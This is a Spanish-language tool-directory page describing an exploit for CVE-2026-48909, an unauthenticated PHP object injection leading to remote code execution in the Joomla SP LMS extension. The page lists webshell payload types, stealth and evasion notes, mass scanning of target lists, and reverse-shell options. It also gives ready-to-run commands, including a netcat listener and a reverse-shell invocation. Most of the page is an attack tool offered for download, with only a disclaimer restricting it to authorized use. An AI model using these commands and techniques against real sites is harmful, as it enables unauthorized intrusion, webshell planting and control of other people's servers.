Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Exploit de inyección de objetos PHP no autenticada a RCE para la extensión SP LMS de Joomla en versiones <= 4.1.3. Explota la deserialización de la cookie lmsOrders para escribir un webshell mediante la cadena de gadgets FormattedtextLogger de Joomla. Incluye shell interactiva, descubrimiento de rutas y limpieza. Solo para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed Teaming
Desarrollo de Payloads
Labs y Práctica
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Ver Repositorio
215hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

CVE-2026-48909 - Exploit de inyección de objetos PHP no autenticada a RCE para la extensión SP LMS de Joomla en versiones <= 4.1.3. Explota la deserialización de la cookie lmsOrders para escribir un webshell mediante la cadena de gadgets FormattedtextLogger de Joomla. Incluye shell interactiva, descubrimiento de rutas y limpieza. Solo para pruebas de seguridad autorizadas.

Compartir

CVE-2026-48909

Joomla SP LMS — Inyección de Objetos PHP no Autenticada → Ejecución Remota de Código

Python Version CVSS License Platform

Herramienta de prueba de concepto para CVE-2026-48909
Autor: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Solo para uso autorizado. Esta herramienta está destinada a la investigación de seguridad, educación y pruebas en sistemas que poseas o para los cuales tengas permiso explícito por escrito. El acceso no autorizado a sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el uso indebido.


Table of Contents

  • Overview
  • Vulnerability Details
  • Features
  • Installation
  • Quick Start
  • Usage Guide
  • Command Reference
  • Payload Types
  • Attack Chain
  • Output Examples
  • Troubleshooting
  • Repository Layout
  • Version History
  • Disclaimer
  • Author

Overview

CVE-2026-48909 es una inyección de objetos PHP no autenticada crítica en la extensión SP LMS de Joomla. Esta herramienta implementa la cadena de ataque completa para que los profesionales de seguridad puedan validar el impacto en entornos de laboratorio o autorizados.

Cubre detección, descubrimiento de rutas, entrega de payloads, post-explotación interactiva (donde esté permitido), evaluación masiva y limpieza opcional.


Vulnerability Details

AtributoValor
CVE IDCVE-2026-48909
CVSS9.5 (Crítico)
Vector de AtaqueRed — no autenticado
ImpactoEjecución Remota de Código
Producto AfectadoJoomla SP LMS
Versiones Afectadas1.0.0 – 4.1.3
Versión ParcheadaSP LMS 4.1.4+
Cadena de GadgetsRequiere Joomla < 5.2.2

Matriz de Compatibilidad

ComponenteVersiónRCE
SP LMS< 4.1.4Vulnerable
SP LMS≥ 4.1.4Parcheado
Joomla< 5.2.2Cadena de gadgets utilizable
Joomla≥ 5.2.2Cadena de gadgets parcheada

Features

Principal

CapacidadDescripción
Explotación no autenticadaNo se requieren credenciales
Múltiples payloads7 variantes de webshell / ejecución
Shell interactivoSesión con historial de comandos tras el despliegue
Descubrimiento de rutasSondeo automático de rutas escribibles
LimpiezaEliminar webshell desplegada tras las pruebas

Evaluación y Operaciones

CapacidadDescripción
Escaneo masivoListas de objetivos con múltiples hilos (1000+)
Soporte de proxyHTTP/SOCKS (Burp, ZAP, etc.)
Reverse shellPayloads basados en listener
Modo sigilosoCanales de comandos mediante cabeceras / POST
AleatorizaciónNombres UUID para shells, rotación de User-Agent
InformesExportar como JSON, HTML o CSV
Asistencias de detecciónVerificación de versión de Joomla, --check-only, --safe-mode

Notas de Evasión

  • Evita caracteres bloqueados por el filtro cmd de Joomla cuando es posible
  • Ruta de escritura PHP en hexadecimal para reducir problemas con padding de base64 y barras
  • Retrasos configurables y rotación de User-Agents
  • Lógica de reintento entre múltiples candidatos de inyección/ruta

Installation

Prerrequisitos

  • Python 3.6+
  • pip
  • Acceso de red al objetivo(s) bajo prueba

Configuración

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Dependencias

requests>=2.31.0
urllib3>=2.0.0

argparse viene incluido en la biblioteca estándar de Python; no es necesario instalarlo mediante pip.


Quick Start

Reemplaza https://target.example con un objetivo de laboratorio o autorizado únicamente.

Objetivo único — descubrir ruta + shell interactivo

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Verificaciones seguras (sin explotación)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Escaneo masivo

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Reverse shell (laboratorio autorizado)

# Listener
nc -lvnp 4444

# Host de explotación
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Usage Guide

Descubrimiento de rutas

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Ruta escribible conocida

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Sesión interactiva

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Comando único

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Payload sigiloso + interactivo

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Limpieza

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Formato de lista de objetivos

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Command Reference

Objetivo

ArgumentoDescripción
targetURL del objetivo único
--targets, -T FILEArchivo con objetivos (una URL por línea)
--path PATHRuta absoluta en el servidor para la webshell
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMENombre del archivo webshell (por defecto: x.php)

Red

ArgumentoDescripción
--timeout SECONDSTiempo de espera de las peticiones (por defecto: 15)
--insecureOmitir verificación de certificados TLS
--proxy URLej. http://127.0.0.1:8080
--random-uaRotar User-Agent (activado por defecto)
--delay SECONDSRetardo entre peticiones

Reverse shell

ArgumentoDescripción
--reverse-host HOSTHost del listener
--reverse-port PORTPuerto del listener

Modos

ArgumentoDescripción
--interactive, -iShell interactivo tras el despliegue
--check-onlySolo verificar vulnerabilidad
--safe-modePruebas no destructivas
--find-pathAuto-descubrir ruta escribible
--cmd COMMANDEjecutar un comando y salir
--cleanup PATHEliminar webshell en la ruta especificada
--cleanup-afterLimpiar después de la explotación
Descargar herramienta